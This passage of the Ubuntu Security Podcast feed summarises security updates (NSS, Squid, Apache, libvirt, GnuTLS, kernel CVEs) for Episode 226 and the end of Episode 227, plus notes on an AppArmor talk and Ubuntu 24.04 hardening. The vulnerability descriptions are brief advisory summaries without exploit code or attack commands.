<li><a href="https://ubuntu.com/security/CVE-2024-2494">CVE-2024-2494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1441">CVE-2024-1441</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6744-3-pillow-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6744-3">USN-6744-3</a>] Pillow vulnerability</h3>
<ul>
<li>1 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-28219">CVE-2024-28219</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-24-dot-04-lts--noble-numbat--released--14-27">Ubuntu 24.04 LTS (Noble Numbat) released (14:27)</h3>
<ul>
<li><a href="https://ubuntu.com/blog/canonical-releases-ubuntu-24-04-noble-numbat">https://ubuntu.com/blog/canonical-releases-ubuntu-24-04-noble-numbat</a></li>
<li><a href="https://ubuntu.com/blog/ubuntu-desktop-24-04-noble-numbat-deep-dive">https://ubuntu.com/blog/ubuntu-desktop-24-04-noble-numbat-deep-dive</a></li>
<li><a href="https://ubuntu.com/blog/whats-new-in-security-for-ubuntu-24-04-lts">https://ubuntu.com/blog/whats-new-in-security-for-ubuntu-24-04-lts</a></li>
<li>Up to 12 years of support via Ubuntu Pro + Legacy Support Add-on</li>
<li>New security features / improvements:
<ul>
<li>Unprivileged user namespace restrictions</li>
<li>Binary hardening</li>
<li>AppArmor 4</li>
<li>Disabling of old TLS versions</li>
<li>Upstream Kernel Security Features
<ul>
<li>Intel shadow stack support</li>
<li>Secure virtualisation with AMD SEV-SNP and Intel TDX</li>
<li>Strict compile-time bounds checking</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E227.mp3" length="24684354" type="audio/mpeg" /><itunes:duration>1481</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 226
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-226/</link>
          <pubDate>Fri, 19 Apr 2024 16:45:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>10f17d09cebded4973031faf11b1b7c26cde4b8e16154b16825840b98e9fef85b9c0ca60e75ee0fbe91c55963e78bcbe7ec32d61ca69ccd333f986d8e34010d3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 226</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          John and Georgia are at the Linux Security Summit presenting on some long
  awaited developments in AppArmor and we give you all the details in a sneak peek
  preview as well as some of the other talks to look out for, plus we cover...
        
        ]]></itunes:subtitle>
        <itunes:summary>  John and Georgia are at the Linux Security Summit presenting on some long
  awaited developments in AppArmor and we give you all the details in a sneak peek
  preview as well as some of the other talks to look out for, plus we cover
  security updates for NSS, Squid, Apache, libvirt and more and we put out a call
  for testing of a pending AppArmor security fix too.
  </itunes:summary>
        <description>  John and Georgia are at the Linux Security Summit presenting on some long
  awaited developments in AppArmor and we give you all the details in a sneak peek
  preview as well as some of the other talks to look out for, plus we cover
  security updates for NSS, Squid, Apache, libvirt and more and we put out a call
  for testing of a pending AppArmor security fix too.
  </description>
        <googleplay:description>  John and Georgia are at the Linux Security Summit presenting on some long
  awaited developments in AppArmor and we give you all the details in a sneak peek
  preview as well as some of the other talks to look out for, plus we cover
  security updates for NSS, Squid, Apache, libvirt and more and we put out a call
  for testing of a pending AppArmor security fix too.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>John and Georgia are at the Linux Security Summit presenting on some long
awaited developments in AppArmor and we give you all the details in a sneak peek
preview as well as some of the other talks to look out for, plus we cover
security updates for NSS, Squid, Apache, libvirt and more and we put out a call
for testing of a pending AppArmor security fix too.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>86 unique CVEs addressed</p>
<h3 id="usn-6727-1-usn-6727-2-nss-vulnerabilities-plus-regression--01-02">[<a href="https://ubuntu.com/security/notices/USN-6727-1">USN-6727-1</a>, <a href="https://ubuntu.com/security/notices/USN-6727-2">USN-6727-2</a>] NSS vulnerabilities + regression (01:02)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6135">CVE-2023-6135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5388">CVE-2023-5388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4421">CVE-2023-4421</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All various different timing side channels - two were effectively the same
since the original fix was incomplete - mishandling of padding in PKCS#1 (RSA)
certificate checks - possible to infer the length of the encrypted message and
other properties to eventually infer secret key by sending a large number of
attacker-chosen ciphertexts, the other when using various NIST
curves (elliptic curve cryptography)</li>
<li>Original fix caused some issues with loading NSS security modules so published
a second update to fix that on focal+jammy</li>
</ul>
<h3 id="usn-6728-1-usn-6728-2-squid-vulnerabilities-plus-regression--02-05">[<a href="https://ubuntu.com/security/notices/USN-6728-1">USN-6728-1</a>, <a href="https://ubuntu.com/security/notices/USN-6728-2">USN-6728-2</a>] Squid vulnerabilities + regression (02:05)</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25617">CVE-2024-25617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25111">CVE-2024-25111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23638">CVE-2024-23638</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5824">CVE-2023-5824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49288">CVE-2023-49288</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All found by the same researcher (Joshua Rogers) who performed a security
audit of Squid back in 2021 -
<a href="https://megamansec.github.io/Squid-Security-Audit/">https://megamansec.github.io/Squid-Security-Audit/</a> - first mentioned by us in
<a href="/episode-214/#usn-6500-1-squid-vulnerabilities--10-20">[USN-6500-1] Squid vulnerabilities in Episode
214</a> back in December 2023</li>
<li>Then we mentioned how squid was under-resourced and so hadn&rsquo;t be able to fix
all the identified issues - over time upstream has published fixes for more
issues and we are now incorporating those into squid in Ubuntu</li>
<li>All of these were various DoS issues where could either cause squid to crash
or stop responding</li>
<li>One of these fixes was problematic and caused squid to crash itself so was reverted</li>
</ul>
<h3 id="usn-6729-1-apache-http-server-vulnerabilities--03-01">[<a href="https://ubuntu.com/security/notices/USN-6729-1">USN-6729-1</a>] Apache HTTP Server vulnerabilities (03:01)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-27316">CVE-2024-27316</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24795">CVE-2024-24795</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38709">CVE-2023-38709</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different issues that could result in HTTP request splitting attacks -
similar to HTTP request smuggling which is a more specific version of this
attack, relies on different parsing/interpretation of HTTP request messages by
an intermediate (load balancer/proxy/WAF etc.) to split a single HTTP request
into multiple HTTP requests at the backend - allowing to bypass restrictions
along the way - usually involves the use of injected CR/LF/TAB/SPC etc in
headers</li>
<li>Plus memory-based DoS in handling of HTTP/2 - client could just keep sending
more headers, buffered by the server so it can generate an informative
response, until it exhausts memory
<ul>
<li>limit to just 100 headers before bailing with such an error</li>
</ul>
</li>
</ul>
<h3 id="usn-6730-1-apache-maven-shared-utils-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6730-1">USN-6730-1</a>] Apache Maven Shared Utils vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29599">CVE-2022-29599</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6731-1-yard-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6731-1">USN-6731-1</a>] YARD vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-27285">CVE-2024-27285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1020001">CVE-2019-1020001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17042">CVE-2017-17042</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6732-1-webkitgtk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6732-1">USN-6732-1</a>] WebKitGTK vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-23284">CVE-2024-23284</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23280">CVE-2024-23280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23263">CVE-2024-23263</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23254">CVE-2024-23254</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23252">CVE-2024-23252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42956">CVE-2023-42956</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42950">CVE-2023-42950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42843">CVE-2023-42843</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6733-1-gnutls-vulnerabilities--04-57">[<a href="https://ubuntu.com/security/notices/USN-6733-1">USN-6733-1</a>] GnuTLS vulnerabilities (04:57)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-28835">CVE-2024-28835</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-28834">CVE-2024-28834</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Timing side-channel in ECDSA</li>
<li>Crash when verifying crafted PEM bundles -&gt; DoS</li>
</ul>
<h3 id="usn-6734-1-libvirt-vulnerabilities--05-13">[<a href="https://ubuntu.com/security/notices/USN-6734-1">USN-6734-1</a>] libvirt vulnerabilities (05:13)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-2496">CVE-2024-2496</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2494">CVE-2024-2494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1441">CVE-2024-1441</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>off-by-one in handling of udev interface names - unpriv client could then
abuse this to send crafted udev data to the libvirt daemon, triggering a crash -&gt; DoS</li>
<li>NULL ptr deref in same code - race condition, need to detach a host interface
whilst calling into the function</li>
<li>Crash in RPC handling - pass a negative length value, would then try and
allocate a negative number of array indices - uses underlying <code>g_new0()</code> from
<a href="https://developer-old.gnome.org/glib/stable/glib-Memory-Allocation.html#g-new0">glib</a> which expects an unsigned value -&gt; tries to allocate an extremely large
amount of memory -&gt; crash</li>
</ul>
<h3 id="usn-6735-1-node-dot-js-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6735-1">USN-6735-1</a>] Node.js vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-30590">CVE-2023-30590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30589">CVE-2023-30589</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30588">CVE-2023-30588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6736-1-klibc-vulnerabilities--06-33">[<a href="https://ubuntu.com/security/notices/USN-6736-1">USN-6736-1</a>] klibc vulnerabilities (06:33)</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37434">CVE-2022-37434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25032">CVE-2018-25032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9841">CVE-2016-9841</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9840">CVE-2016-9840</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All old memory corruption issues in zlib - vendored within klibc</li>
</ul>
<h3 id="usn-6724-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6724-2">USN-6724-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52438">CVE-2023-52438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52435">CVE-2023-52435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52436">CVE-2023-52436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52434">CVE-2023-52434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23850">CVE-2024-23850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-22705">CVE-2024-22705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6610">CVE-2023-6610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23851">CVE-2024-23851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52429">CVE-2023-52429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50431">CVE-2023-50431</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46838">CVE-2023-46838</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6725-2-linux-kernel--aws--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6725-2">USN-6725-2</a>] Linux kernel (AWS) vulnerabilities</h3>
<ul>
<li>46 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52470">CVE-2023-52470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52469">CVE-2023-52469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52451">CVE-2023-52451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52610">CVE-2023-52610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52441">CVE-2023-52441</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52467">CVE-2023-52467</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52449">CVE-2023-52449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26591">CVE-2024-26591</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52458">CVE-2023-52458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26597">CVE-2024-26597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26633">CVE-2024-26633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52436">CVE-2023-52436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52444">CVE-2023-52444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26589">CVE-2024-26589</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26586">CVE-2024-26586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26598">CVE-2024-26598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52612">CVE-2023-52612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26631">CVE-2024-26631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52442">CVE-2023-52442</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52443">CVE-2023-52443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52480">CVE-2023-52480</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52438">CVE-2023-52438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52454">CVE-2023-52454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52456">CVE-2023-52456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52464">CVE-2023-52464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52457">CVE-2023-52457</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52448">CVE-2023-52448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52609">CVE-2023-52609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52462">CVE-2023-52462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52445">CVE-2023-52445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52463">CVE-2023-52463</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24860">CVE-2024-24860</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23850">CVE-2024-23850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-22705">CVE-2024-22705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23851">CVE-2024-23851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52429">CVE-2023-52429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52340">CVE-2023-52340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46838">CVE-2023-46838</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3867">CVE-2023-3867</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38431">CVE-2023-38431</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38430">CVE-2023-38430</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38427">CVE-2023-38427</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32258">CVE-2023-32258</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32254">CVE-2023-32254</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1194">CVE-2023-1194</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6726-2-linux-kernel--iot--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6726-2">USN-6726-2</a>] Linux kernel (IoT) vulnerabilities</h3>
<ul>
<li>23 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52438">CVE-2023-52438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52436">CVE-2023-52436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52454">CVE-2023-52454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52470">CVE-2023-52470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52451">CVE-2023-52451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52445">CVE-2023-52445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52469">CVE-2023-52469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52609">CVE-2023-52609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52444">CVE-2023-52444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52449">CVE-2023-52449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26597">CVE-2024-26597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26633">CVE-2024-26633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52612">CVE-2023-52612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52443">CVE-2023-52443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52457">CVE-2023-52457</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52448">CVE-2023-52448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52464">CVE-2023-52464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0607">CVE-2024-0607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23851">CVE-2024-23851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52429">CVE-2023-52429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52340">CVE-2023-52340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46838">CVE-2023-46838</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6726-3-linux-kernel--xilinx-zynqmp--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6726-3">USN-6726-3</a>] Linux kernel (Xilinx ZynqMP) vulnerabilities</h3>
<ul>
<li>23 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52438">CVE-2023-52438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52436">CVE-2023-52436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52454">CVE-2023-52454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52470">CVE-2023-52470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52451">CVE-2023-52451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52445">CVE-2023-52445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52469">CVE-2023-52469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52609">CVE-2023-52609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52444">CVE-2023-52444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52449">CVE-2023-52449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26597">CVE-2024-26597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26633">CVE-2024-26633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52612">CVE-2023-52612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52443">CVE-2023-52443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52457">CVE-2023-52457</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52448">CVE-2023-52448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52464">CVE-2023-52464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0607">CVE-2024-0607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23851">CVE-2024-23851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52429">CVE-2023-52429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52340">CVE-2023-52340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46838">CVE-2023-46838</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="linux-security-summit-na-2024--07-22">Linux Security Summit NA 2024 (07:22)</h3>
<ul>
<li><a href="https://events.linuxfoundation.org/linux-security-summit-north-america/">https://events.linuxfoundation.org/linux-security-summit-north-america/</a></li>
<li><a href="https://lssna24.sched.com/event/1aIe6/unprivileged-access-control-in-apparmor-john-johansen-georgia-garcia-canonical?iframe=no">Unprivileged Access Control in AppArmor - John Johansen &amp; Georgia Garcia, Canonical</a>
<ul>
<li><a href="https://static.sched.com/hosted_files/lssna24/97/AppArmor%20-%20Unprivileged%20Application%20Policy.pdf">https://static.sched.com/hosted_files/lssna24/97/AppArmor%20-%20Unprivileged%20Application%20Policy.pdf</a></li>
<li>Friday 19th @ 9.15am PDT - live stream at <a href="https://www.youtube.com/watch?v=S-RQZGRoQFY">https://www.youtube.com/watch?v=S-RQZGRoQFY</a></li>
<li>AppArmor - MAC - sysadmin defines policy</li>
<li>Allowing applications to define and load their own policy
<ul>
<li>APIs in libapparmor to allow this to be done from static policy OR to build up policy over time</li>
<li>policy is compiled in userspace and loaded into the kernel as usual</li>
<li>To then stop a compromised application from unloading its policy, can mark
it immutable so it can&rsquo;t be further modified / removed</li>
<li>Any further restrictions though can then be stacked against the immutable
policy to say allow it to be confined futher</li>
<li>On kernel side
<ul>
<li>sysctl to allow/deny applications to load their own policy</li>
<li>checks on the amount of memory able to be used to avoid apps DoSing system</li>
<li>verification of compiled policy by kernel state machine</li>
<li>policy only applies to the task and its children</li>
</ul>
</li>
<li>Various complexities in handling credentials/labels across tasks
(ie. processes) and how these interact with the userspace
processes/threads etc</li>
<li>Also still have to resolve whether to use prctl vs syscall as the
interface since we can&rsquo;t use the LSM syscalls
<ul>
<li>May result in an AppArmor specific syscall</li>
<li>But for now just using a prctl</li>
</ul>
</li>
<li>Application profiles then stack against any relevant system policy</li>
<li>ie. if there is system policy, and policy loaded by the application itself is bounded by the system policy</li>
</ul>
</li>
<li>Demo of implementing <code>pledge()</code> and <code>unveil()</code> from OpenBSD
